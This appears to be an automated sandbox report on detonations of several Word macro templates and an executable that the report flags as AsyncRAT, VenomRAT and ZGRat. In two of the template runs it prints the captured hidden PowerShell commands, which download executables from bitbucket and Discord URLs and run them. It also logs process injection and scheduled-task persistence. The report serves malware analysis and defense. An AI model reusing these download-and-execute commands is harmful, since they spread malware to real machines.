memory/4064-7-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-6-0x00007FFD561B0000-0x00007FFD561C0000-memory.dmp

memory/4064-5-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-9-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-10-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-8-0x00007FFD561B0000-0x00007FFD561C0000-memory.dmp

memory/4064-4-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-12-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-11-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-13-0x00007FFD53FF0000-0x00007FFD54000000-memory.dmp

memory/4064-14-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-15-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-17-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-18-0x00007FFD53FF0000-0x00007FFD54000000-memory.dmp

memory/4064-16-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-35-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-36-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-40-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-41-0x00007FFD961CD000-0x00007FFD961CE000-memory.dmp

memory/4064-42-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-48-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-49-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20241010-en

Max time kernel

72s

Max time network

43s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eeee.dotm"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eeee.dotm"

Network

N/A

Files

memory/2932-0-0x000000002F251000-0x000000002F252000-memory.dmp

memory/2932-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2932-2-0x00000000719BD000-0x00000000719C8000-memory.dmp

memory/2932-6-0x00000000002C0000-0x00000000003C0000-memory.dmp

memory/2932-8-0x00000000002C0000-0x00000000003C0000-memory.dmp

memory/2932-7-0x00000000002C0000-0x00000000003C0000-memory.dmp

memory/2932-5-0x00000000002C0000-0x00000000003C0000-memory.dmp

memory/2932-4-0x00000000002C0000-0x00000000003C0000-memory.dmp

memory/2932-9-0x00000000719BD000-0x00000000719C8000-memory.dmp

memory/2932-10-0x00000000002C0000-0x00000000003C0000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240903-en

Max time kernel

118s

Max time network

128s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\egor.dotm"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\egor.dotm"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/Zos.e`xe -Dest C:\Users\Public\Zos.e`xe;C:\Users\Public\Zos.e`xe

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

N/A

Files

memory/2816-0-0x000000002F731000-0x000000002F732000-memory.dmp

memory/2816-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2816-2-0x000000007174D000-0x0000000071758000-memory.dmp

memory/2816-6-0x0000000006110000-0x0000000006210000-memory.dmp

memory/2816-10-0x000000007174D000-0x0000000071758000-memory.dmp

memory/2816-11-0x0000000006110000-0x0000000006210000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

152s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\errr.dotm" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\errr.dotm" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

memory/4128-1-0x00007FF9C026D000-0x00007FF9C026E000-memory.dmp

memory/4128-2-0x00007FF980250000-0x00007FF980260000-memory.dmp

memory/4128-4-0x00007FF980250000-0x00007FF980260000-memory.dmp

memory/4128-3-0x00007FF980250000-0x00007FF980260000-memory.dmp

memory/4128-0-0x00007FF980250000-0x00007FF980260000-memory.dmp

memory/4128-5-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-6-0x00007FF980250000-0x00007FF980260000-memory.dmp

memory/4128-7-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-10-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-9-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-12-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-15-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-16-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-14-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-13-0x00007FF97DB00000-0x00007FF97DB10000-memory.dmp

memory/4128-11-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-8-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-20-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-18-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-17-0x00007FF97DB00000-0x00007FF97DB10000-memory.dmp

memory/4128-19-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-22-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-21-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-38-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-37-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-44-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-45-0x00007FF9C026D000-0x00007FF9C026E000-memory.dmp

memory/4128-46-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 90e491fde30f46b3b66348b549db80bf
SHA1 62e2e4a1f87ea4b61e218ecb5c21f669e933f3be
SHA256 c44019c6fcc4f6107fa82e54dc5c2ea395d0d7419668a2810711b54b5fafacd4
SHA512 c6376f45328a87b8803c63f0bc78e0468532fb2ed05ded2dd6cfb4b0f93a6b62dad737bbafedddb5590a100dffdc256615d7ac4a6f3f75e67bee3e639ee1f42e

memory/4128-52-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20240903-en

Max time kernel

121s

Max time network

135s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\example.dotm"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2068 wrote to memory of 2892 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2892 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2892 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2892 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2692 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2692 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2692 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2692 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2836 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2068 wrote to memory of 2836 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2068 wrote to memory of 2836 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2068 wrote to memory of 2836 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\example.dotm"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://cdn.discordapp.com/attachments/1074394309446619298/1085646503940464700/putty.exe -Dest C:\Users\Public\putty.exe;C:\Users\Public\putty.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/simplecryptservice.docx -Dest C:\Users\Public\simplecryptservice.docx;C:\Users\Public\simplecryptservice.docx

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

N/A

Files

memory/2068-0-0x000000002F7D1000-0x000000002F7D2000-memory.dmp

memory/2068-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2068-2-0x00000000717AD000-0x00000000717B8000-memory.dmp

memory/2068-10-0x0000000005020000-0x0000000005120000-memory.dmp

memory/2068-18-0x0000000005020000-0x0000000005120000-memory.dmp

memory/2068-17-0x0000000005020000-0x0000000005120000-memory.dmp

memory/2068-30-0x00000000717AD000-0x00000000717B8000-memory.dmp

memory/2068-31-0x0000000005020000-0x0000000005120000-memory.dmp

memory/2068-32-0x0000000005020000-0x0000000005120000-memory.dmp

memory/2068-33-0x0000000005020000-0x0000000005120000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240903-en

Max time kernel

120s

Max time network

138s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ferrr.dotm"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ferrr.dotm"

Network

N/A

Files

memory/2296-0-0x000000002F701000-0x000000002F702000-memory.dmp

memory/2296-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2296-2-0x0000000070ACD000-0x0000000070AD8000-memory.dmp

memory/2296-8-0x00000000050E0000-0x00000000051E0000-memory.dmp

memory/2296-9-0x0000000070ACD000-0x0000000070AD8000-memory.dmp

memory/2296-10-0x00000000050E0000-0x00000000051E0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

89s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect ZGRat V2

Description Indicator Process Target
N/A N/A N/A N/A

VenomRAT

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Venomrat family

venomrat

ZGRat

rat zgrat

Zgrat family

zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2788 set thread context of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Google Update.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Google Update.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2788 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe
PID 2788 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 624 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\System32\cmd.exe
